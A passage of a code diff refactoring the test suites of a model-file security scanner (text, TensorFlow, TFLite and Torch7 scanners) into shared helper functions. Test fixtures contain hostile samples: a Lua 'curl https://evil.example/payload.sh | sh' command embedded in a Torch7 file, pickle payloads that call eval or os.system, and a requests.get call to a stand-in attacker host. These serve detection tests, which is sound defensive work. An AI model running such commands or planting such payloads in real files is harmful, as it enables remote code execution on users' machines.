Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_endpoint_redaction_limit(tmp_path, monkeypatch, ("\nendpoint:\n url: https://evil.example/payload.sh\n")) def test_text_scanner_documentation_endpoint_redaction_limit_with_list_nested_config_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + "\nendpoint:\n - url: https://evil.example/payload.sh\n", - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_endpoint_redaction_limit(tmp_path, monkeypatch, ("\nendpoint:\n - url: https://evil.example/payload.sh\n")) def test_text_scanner_documentation_endpoint_redaction_limit_with_list_object_config_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + "\nendpoints:\n - name: prod\n url: https://evil.example/payload.sh\n", - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks + _assert_endpoint_redaction_limit( + tmp_path, monkeypatch, ("\nendpoints:\n - name: prod\n url: https://evil.example/payload.sh\n") ) @@ -5899,32 +4579,7 @@ def test_text_scanner_documentation_endpoint_redaction_limit_with_unknown_tld_co tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + "\nendpoint: evil.online\n", - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_endpoint_redaction_limit(tmp_path, monkeypatch, ("\nendpoint: evil.online\n")) def test_text_scanner_documentation_classification_limit_is_inconclusive(tmp_path: Path) -> None: @@ -6072,53 +4727,11 @@ def test_text_scanner_passive_vocabulary_network_limit_is_informational(tmp_path def test_text_scanner_active_vocabulary_url_limit_fails_closed(tmp_path: Path) -> None: - text_path = tmp_path / "tokens.txt" - text_path.write_text( - ("https://docs.example.com/reference\n" * 2) + "endpoint=https://evil.example/payload\n", - encoding="utf-8", - ) - - result = TextScanner( - config={ - "check_secrets": False, - "text_content_max_findings": 2, - } - ).scan(str(text_path)) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding", {}).get("type") == "url_detected" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_active_url_limit(tmp_path, (2)) def test_text_scanner_active_vocabulary_url_after_limit_fails_closed(tmp_path: Path) -> None: - text_path = tmp_path / "tokens.txt" - text_path.write_text( - ("https://docs.example.com/reference\n" * 3) + "endpoint=https://evil.example/payload\n", - encoding="utf-8", - ) - - result = TextScanner( - config={ - "check_secrets": False, - "text_content_max_findings": 2, - } - ).scan(str(text_path)) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding", {}).get("type") == "url_detected" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_active_url_limit(tmp_path, (3)) def test_text_scanner_secret_finding_limit_fails_closed(tmp_path: Path) -> None: @@ -6342,12 +4955,313 @@ def test_text_scanner_documentation_image_example_requires_expected_pil_shape( executes downloaded bytes and still be treated as the documented example. """ path = tmp_path / "README.md" - path.write_text(example, encoding="utf-8") - - result = TextScanner().scan(str(path)) + result = _scan_text_content(path, example) assert result.success is False, label assert any( check.details.get("function") == "urlopen" and check.severity == IssueSeverity.CRITICAL for check in _failed_network_detection_checks(result) ), label + + +def _count_documentation_validations(monkeypatch: pytest.MonkeyPatch) -> list[int]: + original_validate = network_comm._is_official_readme_urlopen_image_example + validation_calls = [0] + + def track_validation(example: bytes) -> bool: + validation_calls[0] += 1 + return original_validate(example) + + monkeypatch.setattr(network_comm, "_is_official_readme_urlopen_image_example", track_validation) + return validation_calls + + +def _assert_documentation_scan_actionable(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + + assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + + +def _assert_documentation_actionable(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + assert determine_exit_code(aggregate) == 1 + + +def _assert_documentation_scan_informational(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + + assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + + +def _assert_requirements_actionable(tmp_path: Path, requirement_line: str) -> None: + text_path = tmp_path / "requirements.txt" + text_path.write_text(f"{requirement_line}\n", encoding="utf-8") + + result = TextScanner().scan(str(text_path)) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in result.checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_documentation_routed_to_text(tmp_path: Path, filename: str) -> None: + text_path = tmp_path / filename + text_path.write_text('requests.get("https://evil.example/payload")\n', encoding="utf-8") + + result = scan_file(str(text_path), config={"cache_scan_results": False}) + + assert TextScanner.can_handle(str(text_path)) + assert result.scanner_name == "text" + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == "network_function" + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +def _assert_model_card_endpoint_informational(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "model_card.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + network_checks = _failed_network_detection_checks(result) + + assert network_checks + assert all(check.severity == IssueSeverity.INFO for check in network_checks) + assert determine_exit_code(aggregate) == 0 + + +def _assert_documentation_informational(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + assert determine_exit_code(aggregate) == 0 + + +def _assert_model_card_payload_endpoint_actionable(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "model_card.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + network_checks = _failed_network_detection_checks(result) + + assert any( + check.details.get("type") == "url_detected" + and check.details.get("normalized_evidence") + == { + "kind": "url", + "value": "https://evil.example/payload.sh", + } + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in network_checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_documentation_network_actionable(tmp_path: Path, content: str, expected_type: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == expected_type + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in result.checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_model_card_endpoint_evidence(tmp_path: Path, source_text: str) -> None: + text_path = tmp_path / "model_card.md" + result = _scan_text_content(text_path, source_text) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + network_checks = _failed_network_detection_checks(result) + + assert any( + check.details.get("normalized_evidence") + == { + "kind": "url", + "value": "https://evil.example/payload.sh", + } + for check in network_checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_endpoint_redaction_limit(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, endpoint_text: str) -> None: + monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) + text_path = tmp_path / "README.md" + text_path.write_text( + "api_key references below are documentation-only.\n" + + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) + + endpoint_text, + encoding="utf-8", + ) + + result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) + aggregate = scan_model_directory_or_file( + str(text_path), + config={"check_secrets": False}, + cache_enabled=False, + ) + + assert result.success is False + assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME + assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" + assert determine_exit_code(aggregate) == 2 + assert any( + check.name == "Text Content Security Coverage" + and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" + and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" + for check in result.checks + ) + + +def _assert_vocabulary_endpoint(tmp_path: Path, filename: str) -> None: + text_path = tmp_path / filename + result = _scan_text_content(text_path, "endpoint=https://evil.example/payload\n") + + assert any( + check.name == "Network Communication Detection" + and check.status == CheckStatus.FAILED + and check.details.get("type") == "url_detected" + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in result.checks + ) + + +def _assert_command_endpoint(tmp_path: Path, content: str, expected_url: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == "url_detected" + and check.details.get("url") == expected_url + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in result.checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_network_info(tmp_path: Path, content: str, finding_type: str, detail_key: str, name: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == finding_type + and check.details.get(detail_key) == name + and check.severity == IssueSeverity.INFO + for check in result.checks + ) + assert determine_exit_code(aggregate) == 0 + + +def _assert_active_url_limit(tmp_path: Path, finding_limit: int) -> None: + text_path = tmp_path / "tokens.txt" + text_path.write_text( + ("https://docs.example.com/reference\n" * finding_limit) + "endpoint=https://evil.example/payload\n", + encoding="utf-8", + ) + + result = TextScanner( + config={ + "check_secrets": False, + "text_content_max_findings": 2, + } + ).scan(str(text_path)) + + assert result.success is False + assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME + assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" + assert any( + check.name == "Text Content Security Coverage" + and check.details.get("truncated_finding", {}).get("type") == "url_detected" + and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" + for check in result.checks + ) + + +def _assert_network_code_after_prose( + tmp_path: Path, content: str, finding_type: str, detail_key: str, name: str +) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == finding_type + and check.details.get(detail_key) == name + and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + for check in result.checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_nested_network_call(tmp_path: Path, content: str, finding_type: str, detail_key: str, name: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == finding_type + and check.details.get(detail_key) == name + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + assert determine_exit_code(aggregate) == 1 + + +def _assert_indirect_network_call(tmp_path: Path, content: str, finding_type: str, detail_key: str, name: str) -> None: + text_path = tmp_path / "README.md" + result = _scan_text_content(text_path, content) + + assert any( + check.name == "Network Communication Detection" + and check.details.get("type") == finding_type + and check.details.get(detail_key) == name + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +def _assert_bibliography_informational(tmp_path: Path, content: str) -> None: + text_path = tmp_path / "model_card.md" + result = _scan_text_content(text_path, content) + aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) + + network_checks = [ + check + for check in result.checks + if check.name == "Network Communication Detection" and check.status == CheckStatus.FAILED + ] + + assert network_checks + assert all(check.severity == IssueSeverity.INFO for check in network_checks) + assert determine_exit_code(aggregate) == 0 + + +def _scan_text_content(text_path: Path, content: str) -> ScanResult: + text_path.write_text(content, encoding="utf-8") + result = TextScanner().scan(str(text_path)) + return result diff --git a/tests/scanners/test_tf_metagraph_scanner.py b/tests/scanners/test_tf_metagraph_scanner.py index 543a64eb8..9c6aa0948 100644 --- a/tests/scanners/test_tf_metagraph_scanner.py +++ b/tests/scanners/test_tf_metagraph_scanner.py @@ -34,6 +34,21 @@ pytestmark = pytest.mark.skipif(not _has_tf_protos(), reason="TensorFlow protobuf stubs unavailable") +def _fail_cached_meta_reads(monkeypatch: pytest.MonkeyPatch, cached_clean: Path) -> None: + real_open = open + + def fail_cached_meta_read( + candidate: str | bytes | os.PathLike[str], + *args: Any, + **kwargs: Any, + ) -> Any: + if str(candidate) == str(cached_clean): + raise OSError("simulated transient MetaGraph read failure") + return real_open(candidate, *args, **kwargs) + + monkeypatch.setattr("builtins.open", fail_cached_meta_read) + + def test_attribute_context_name_handles_many_generated_suffixes() -> None: attr_name = "Authorization" + (".func.name" * 20_000) @@ -293,18 +308,7 @@ def test_tf_metagraph_single_file_scan_bypasses_stale_cache_when_read_fails( cached_entries = get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] assert cached_entries > 0 - real_open = open - - def fail_cached_meta_read( - candidate: str | bytes | os.PathLike[str], - *args: Any, - **kwargs: Any, - ) -> Any: - if str(candidate) == str(cached_clean): - raise OSError("simulated transient MetaGraph read failure") - return real_open(candidate, *args, **kwargs) - - monkeypatch.setattr("builtins.open", fail_cached_meta_read) + _fail_cached_meta_reads(monkeypatch, cached_clean) second = scan_model_directory_or_file( str(cached_clean), @@ -350,18 +354,7 @@ def test_tf_metagraph_directory_scan_bypasses_stale_cache_when_read_fails_with_s assert determine_exit_code(first) == 0 assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] > 0 - real_open = open - - def fail_cached_meta_read( - candidate: str | bytes | os.PathLike[str], - *args: Any, - **kwargs: Any, - ) -> Any: - if str(candidate) == str(cached_clean): - raise OSError("simulated transient MetaGraph read failure") - return real_open(candidate, *args, **kwargs) - - monkeypatch.setattr("builtins.open", fail_cached_meta_read) + _fail_cached_meta_reads(monkeypatch, cached_clean) result = scan_model_directory_or_file( str(model_dir), diff --git a/tests/scanners/test_tf_savedmodel_scanner.py b/tests/scanners/test_tf_savedmodel_scanner.py index 39c92a7f7..b651f2890 100644 --- a/tests/scanners/test_tf_savedmodel_scanner.py +++ b/tests/scanners/test_tf_savedmodel_scanner.py @@ -15,6 +15,9 @@ from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.utils.file.detection import PROTO0_1_MAX_PROBE_BYTES from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as has_tf_protos +from tests.helpers.assertions import _assert_absent +from tests.helpers.file_creators import EvalPayload, SystemCommandPayload +from tests.helpers.file_creators import protobuf_bytes_field as _protobuf_bytes_field class _NodeCollection(Protocol): @@ -34,30 +37,6 @@ class _NodeSpec(_RequiredNodeSpec, total=False): function_ref: str -# Defer TensorFlow check to avoid module-level imports -def has_tensorflow(): - try: - import tensorflow as tf - - # Avoid treating vendored protobuf-only stubs as full TensorFlow runtime. - return bool(getattr(tf, "__version__", None)) and hasattr(tf, "constant") - except Exception: - return False - - -def _protobuf_varint(value: int) -> bytes: - chunks: list[int] = [] - while value > 0x7F: - chunks.append((value & 0x7F) | 0x80) - value >>= 7 - chunks.append(value) - return bytes(chunks) - - -def _protobuf_bytes_field(field_number: int, payload: bytes) -> bytes: - return _protobuf_varint((field_number << 3) | 2) + _protobuf_varint(len(payload)) + payload - - def _keras_metadata_with_malformed_saved_object(payload: bytes) -> bytes: return _protobuf_bytes_field(1, payload) @@ -637,12 +616,7 @@ def create_tf_savedmodel(tmp_path: Path, *, malicious: bool = False) -> Path: # If malicious, add a malicious pickle file if malicious: - - class MaliciousClass: - def __reduce__(self): - return (eval, ("print('malicious code')",)) - - malicious_data = {"malicious": MaliciousClass()} + malicious_data = {"malicious": EvalPayload(("print('malicious code')",))} malicious_pickle = pickle.dumps(malicious_data) (model_dir / "malicious.pkl").write_bytes(malicious_pickle) @@ -652,11 +626,7 @@ def __reduce__(self): def _build_protocol1_pickle_payload() -> bytes: import os as os_module - class DangerousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os_module.system, ("echo savedmodel-asset-test",)) - - return pickle.dumps(DangerousPayload(), protocol=1) + return pickle.dumps(SystemCommandPayload("echo savedmodel-asset-test", lambda: os_module.system), protocol=1) def _build_minimal_pe_bytes() -> bytes: @@ -1371,28 +1341,10 @@ def test_savedmodel_node_attribute_budget_marks_scan_inconclusive( monkeypatch: pytest.MonkeyPatch, ) -> None: monkeypatch.setattr("modelaudit.scanners.tf_savedmodel_scanner._MAX_SAVEDMODEL_NODE_ATTRIBUTES", 2) - model_path = Path( - _create_test_savedmodel_with_scoped_nodes( - tmp_path, - graph_nodes=[ - { - "op": "Const", - "string_attrs": {"label_0": "safe_0", "label_1": "safe_1", "label_2": "safe_2"}, - } - ], - model_name="oversized_node_attribute_budget", - ) + _assert_savedmodel_attribute_budget( + tmp_path, "oversized_node_attribute_budget", "node_attribute_count", "node_attribute_limit_exceeded" ) - result = tf_savedmodel_module.TensorFlowSavedModelScanner().scan(str(model_path / "saved_model.pb")) - budget_checks = [check for check in result.checks if check.name == "SavedModel Graph Traversal Budget"] - - assert result.success is False - assert result.metadata["node_attribute_count"] == 3 - assert len(budget_checks) == 1 - assert budget_checks[0].details["limit_reason"] == "node_attribute_limit_exceeded" - assert budget_checks[0].details["limit_name"] == "node_attribute_count" - @pytest.mark.skipif(not has_tf_protos(), reason="TensorFlow protobuf stubs unavailable") def test_savedmodel_collection_count_budget_marks_scan_inconclusive( @@ -1514,28 +1466,13 @@ def test_savedmodel_scalar_attribute_string_budget_marks_scan_inconclusive( monkeypatch: pytest.MonkeyPatch, ) -> None: monkeypatch.setattr("modelaudit.scanners.tf_savedmodel_scanner._MAX_SAVEDMODEL_ATTRIBUTE_STRING_VALUES", 2) - model_path = Path( - _create_test_savedmodel_with_scoped_nodes( - tmp_path, - graph_nodes=[ - { - "op": "Const", - "string_attrs": {"label_0": "safe_0", "label_1": "safe_1", "label_2": "safe_2"}, - } - ], - model_name="oversized_scalar_attribute_strings", - ) + _assert_savedmodel_attribute_budget( + tmp_path, + "oversized_scalar_attribute_strings", + "attribute_string_value_count", + "attribute_string_value_limit_exceeded", ) - result = tf_savedmodel_module.TensorFlowSavedModelScanner().scan(str(model_path / "saved_model.pb")) - budget_checks = [check for check in result.checks if check.name == "SavedModel Graph Traversal Budget"] - - assert result.success is False - assert result.metadata["attribute_string_value_count"] == 3 - assert len(budget_checks) == 1 - assert budget_checks[0].details["limit_reason"] == "attribute_string_value_limit_exceeded" - assert budget_checks[0].details["limit_name"] == "attribute_string_value_count" - @pytest.mark.skipif(not has_tf_protos(), reason="TensorFlow protobuf stubs unavailable") def test_savedmodel_mixed_attribute_strings_are_allowed_at_budget( @@ -2059,9 +1996,7 @@ def test_savedmodel_preview_redaction_removes_non_scalar_sensitive_values() -> N 500, ) - assert "ARRAYSECRET123" not in preview - assert "OBJECTSECRET456" not in preview - assert "BLOCKSECRET789" not in preview + _assert_absent(preview, "ARRAYSECRET123", "OBJECTSECRET456", "BLOCKSECRET789") assert '"api_key": ' in preview assert '"clientSecret": ' in preview assert "api_key: |\n " in preview @@ -2077,9 +2012,7 @@ def test_savedmodel_preview_redaction_removes_parenthesized_secret_values() -> N 500, ) - assert "PARENSECRET123" not in preview - assert "HEADERSECRET456" not in preview - assert "MAPSECRET789" not in preview + _assert_absent(preview, "PARENSECRET123", "HEADERSECRET456", "MAPSECRET789") assert 'api_key = ("")' in preview assert 'headers["Authorization"] = (\n ""\n)' in preview assert '"clientSecret": ("")' in preview @@ -3266,3 +3199,27 @@ def test_tf_scanner_no_explanation_for_safe_ops(tmp_path: Path) -> None: if issue.why and any(op in issue.why for op in ["TensorFlow", "operation", "graph"]) ] assert len(tf_op_issues_with_explanations) == 0, "Safe operations should not have TF operation explanations" + + +def _assert_savedmodel_attribute_budget(tmp_path: Path, model_name: str, limit_name: str, limit_reason: str) -> None: + model_path = Path( + _create_test_savedmodel_with_scoped_nodes( + tmp_path, + graph_nodes=[ + { + "op": "Const", + "string_attrs": {"label_0": "safe_0", "label_1": "safe_1", "label_2": "safe_2"}, + } + ], + model_name=model_name, + ) + ) + + result = tf_savedmodel_module.TensorFlowSavedModelScanner().scan(str(model_path / "saved_model.pb")) + budget_checks = [check for check in result.checks if check.name == "SavedModel Graph Traversal Budget"] + + assert result.success is False + assert result.metadata[limit_name] == 3 + assert len(budget_checks) == 1 + assert budget_checks[0].details["limit_reason"] == limit_reason + assert budget_checks[0].details["limit_name"] == limit_name diff --git a/tests/scanners/test_tflite_scanner.py b/tests/scanners/test_tflite_scanner.py index 365e9e244..4f8c76580 100644 --- a/tests/scanners/test_tflite_scanner.py +++ b/tests/scanners/test_tflite_scanner.py @@ -12,14 +12,11 @@ from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, IssueSeverity from modelaudit.scanners.tflite_scanner import _MAX_COUNT, TFLiteScanner from modelaudit.utils.file.detection import detect_file_format +from tests.helpers.cache import single_file_metadata as _single_file_metadata HAS_TFLITE = importlib.util.find_spec("tflite") is not None -def _single_file_metadata(aggregate: Any) -> Any: - return next(iter(aggregate.file_metadata.values())) - - def _assert_tflite_inconclusive_exit2(aggregate: Any, reason: str) -> None: metadata = _single_file_metadata(aggregate) assert aggregate.success is False @@ -85,29 +82,11 @@ def test_core_scan_file_preserves_tflite_bin_analysis_with_pytorch_binary_primar def test_renamed_tflite_with_skipped_suffix_routes_through_directory_scan(tmp_path: Path) -> None: - path = tmp_path / "model.jpg" - path.write_bytes(b"\x0c\x00\x00\x00TFL3" + b"\x00" * 100) - - assert TFLiteScanner.can_handle(str(path)) - assert detect_file_format(str(path)) == "tflite" - assert core.scan_file(str(path)).scanner_name == "tflite" - - directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) - assert directory.files_scanned == 1 - assert "tflite" in directory.scanner_names + _assert_tflite_directory_route(tmp_path, ("model.jpg")) def test_extensionless_tflite_routes_through_directory_scan(tmp_path: Path) -> None: - path = tmp_path / "model" - path.write_bytes(b"\x0c\x00\x00\x00TFL3" + b"\x00" * 100) - - assert TFLiteScanner.can_handle(str(path)) - assert detect_file_format(str(path)) == "tflite" - assert core.scan_file(str(path)).scanner_name == "tflite" - - directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) - assert directory.files_scanned == 1 - assert "tflite" in directory.scanner_names + _assert_tflite_directory_route(tmp_path, ("model")) def test_renamed_tflite_near_match_with_skipped_suffix_remains_skipped(tmp_path: Path) -> None: @@ -537,3 +516,16 @@ def test_tflite_mmap_caps_at_validated_size(tmp_path: Path) -> None: # Mapped only the validated size, not the 1 MB now on disk. assert result.bytes_scanned == validated_size + + +def _assert_tflite_directory_route(tmp_path: Path, filename: str) -> None: + path = tmp_path / filename + path.write_bytes(b"\x0c\x00\x00\x00TFL3" + b"\x00" * 100) + + assert TFLiteScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "tflite" + assert core.scan_file(str(path)).scanner_name == "tflite" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 1 + assert "tflite" in directory.scanner_names diff --git a/tests/scanners/test_torch7_scanner.py b/tests/scanners/test_torch7_scanner.py index d7249be8d..fcbec1f74 100644 --- a/tests/scanners/test_torch7_scanner.py +++ b/tests/scanners/test_torch7_scanner.py @@ -10,12 +10,12 @@ from modelaudit.cache import get_cache_manager, reset_cache_manager from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.torch7_scanner import Torch7Scanner +from tests.helpers.assertions import _assert_absent +from tests.helpers.file_creators import write_binary_fixture def _write_torch7_file(tmp_path: Path, payload: bytes, filename: str = "model.t7") -> Path: - path = tmp_path / filename - path.write_bytes(payload) - return path + return write_binary_fixture(tmp_path, filename, payload) def test_can_handle_valid_torch7_file(tmp_path: Path) -> None: @@ -72,16 +72,7 @@ def test_scan_detects_lua_execution_with_network_context(tmp_path: Path) -> None payload = ( b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n" ) - path = _write_torch7_file(tmp_path, payload, filename="malicious.t7") - - result = Torch7Scanner().scan(str(path)) - execution_findings = [ - check - for check in result.checks - if check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED - ] - assert len(execution_findings) == 1 - assert execution_findings[0].severity == IssueSeverity.CRITICAL + _assert_lua_execution(payload, tmp_path, "malicious.t7") def test_scan_redacts_sensitive_torch7_execution_examples(tmp_path: Path) -> None: @@ -145,8 +136,7 @@ def test_torch7_snippet_redacts_prefixed_encoded_and_compound_secrets() -> None: max_chars=500, ) - assert "FULL_LUA_SECRET_123456789" not in snippet - assert "QUERYLEAKSECRET" not in snippet + _assert_absent(snippet, "FULL_LUA_SECRET_123456789", "QUERYLEAKSECRET") assert "token = ; os.execute(" in snippet assert "ok=" in snippet @@ -169,8 +159,7 @@ def test_torch7_snippet_preserves_shell_operators_from_url_query_and_fragment() max_chars=500, ) - assert "QUERYSECRET" not in snippet - assert "FRAGMENTSECRET" not in snippet + _assert_absent(snippet, "QUERYSECRET", "FRAGMENTSECRET") assert "?token=&&sh" in snippet assert "#|sh" in snippet @@ -342,89 +331,39 @@ def test_scan_comment_token_does_not_suppress_lua_execution_detection(tmp_path: b"T7\x00\x00torch.FloatTensor nn.Sequential\n-- decoy comment token\n" b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n" ) - path = _write_torch7_file(tmp_path, payload, filename="malicious-comment.t7") - - result = Torch7Scanner().scan(str(path)) - execution_findings = [ - check - for check in result.checks - if check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED - ] - assert len(execution_findings) == 1 - assert execution_findings[0].severity == IssueSeverity.CRITICAL + _assert_lua_execution(payload, tmp_path, "malicious-comment.t7") def test_scan_detects_bare_string_require_for_untrusted_module(tmp_path: Path) -> None: - payload = b'T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require "socket"\n' - path = _write_torch7_file(tmp_path, payload, filename="bare-require.t7") - - result = Torch7Scanner().scan(str(path)) - - dynamic_findings = [ - check - for check in result.checks - if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED - ] - assert len(dynamic_findings) == 1 - assert dynamic_findings[0].severity == IssueSeverity.WARNING + _assert_torch7_untrusted_require( + tmp_path, (b'T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require "socket"\n'), ("bare-require.t7") + ) def test_scan_detects_long_bracket_require_for_untrusted_module(tmp_path: Path) -> None: - payload = b"T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require [[socket]]\n" - path = _write_torch7_file(tmp_path, payload, filename="long-bracket-require.t7") - - result = Torch7Scanner().scan(str(path)) - - dynamic_findings = [ - check - for check in result.checks - if 